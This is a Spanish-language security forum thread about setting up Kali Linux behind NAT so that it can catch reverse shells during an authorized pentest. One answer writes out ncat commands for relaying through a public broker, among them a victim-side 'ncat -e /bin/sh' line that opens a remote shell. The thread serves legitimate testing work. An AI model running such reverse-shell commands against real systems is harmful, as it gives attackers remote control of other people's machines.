Configuración de Kali Linux para conexiones de shell inversas a través de Internet

4

Estoy ejecutando Kali Linux como una máquina virtual en mi máquina con Windows que está NAT detrás de la red de mi empresa, si deseo realizar una prueba de lápiz en un sitio web para un cliente y creo que es posible usar una shell inversa, ¿cuál es una buena manera? de lograr la conexión?

Tenga en cuenta que no estoy preguntando cómo ejecutar el exploit o inyectar el código shell, sino que estoy solicitando una forma sencilla para que mi netcat local escuche en una dirección IP pública.

Mis pensamientos hasta ahora:

  • El túnel VPN / SSH a un servidor me brinda una conexión directa a Internet a la que mi Kali VM puede conectarse y uso la dirección IP pública de esta conexión para mi shell inversa.
  • El puerto se reenvía desde la conexión de Internet de mi empresa a mi máquina virtual (no es una buena solución si se requieren múltiples puertos en múltiples protocolos).
  • Configure una DMZ en mi máquina virtual Kali, una vez más, no es una buena solución en la red de una empresa.
  • Ejecute Kali desde la nube . Sin embargo, esto significaría mantener mi VM local así como la versión en la nube, y también Amazon debería estar informada de cualquier penetración pruebas por adelantado .
pregunta SilverlightFox 17.03.2014 - 15:40
fuente

3 respuestas

1

Puede configurar pwnat pero necesita el control de ambos lados para negociar el perforador UDP. Ahora quiero que algún desarrollador loco de MSF agregue esta funcionalidad a Meterpreter. Técnicas similares incluyen herramientas como matahari (o, más antiguo, pbounce) y redes particulares como yodo (DNS) o onioncat (nodos Tor).

Si fuera tú, mi teléfono sería un punto de acceso rápido y podría usarse algún tipo de DNS dinámico. Por lo tanto, la perforación de agujeros es en gran medida innecesaria y también lo son muchos otros elementos a los que alude en su pregunta, tales como IaaS, regulaciones, diligencia debida, simplicidad, etc. Si tiene una conexión de cable compartida junto con la conexión de punto de acceso WiFi, podría estar en ambas redes al mismo tiempo.

    
respondido por el atdre 23.03.2014 - 18:55
fuente
0

Puede hacerlo con ncat en una tercera máquina a la que se puede acceder públicamente (uso mi servidor de AWS):

ncat --broker <port>

Máquina atacante:

ncat <public IP> <port>

Máquina de víctimas:

ncat -e /bin/sh <public IP> <port>
    
respondido por el enderw00t 03.04.2016 - 20:51
fuente
0

La mejor solución es ejecutar cualquier máquina Linux con una dirección IP pública, como un VPS, una máquina AWS, o incluso un servidor que utilice solo para pruebas de prueba.

Desde aquí puede ejecutar escuchas de metasploit y / o ncat. Es más fácil si el firewall y las iptables están desactivados.

Metasploit se puede ejecutar localmente pero con el host inverso configurado a la máquina basada en Internet, o completamente en la máquina basada en Internet. Otra opción sería SSH a la máquina y reenviar puertos si desea ejecutar algo localmente.

Una cosa que se debe tener en cuenta es que, para los compromisos de pentesting, probablemente no sea conveniente usar shells de enlace, ya que siempre existe la posibilidad de que un malicioso se conecte y tome el control a menos que se use una forma efectiva de controles de acceso para el shell.

    
respondido por el SilverlightFox 27.12.2018 - 13:00
fuente

Lea otras preguntas en las etiquetas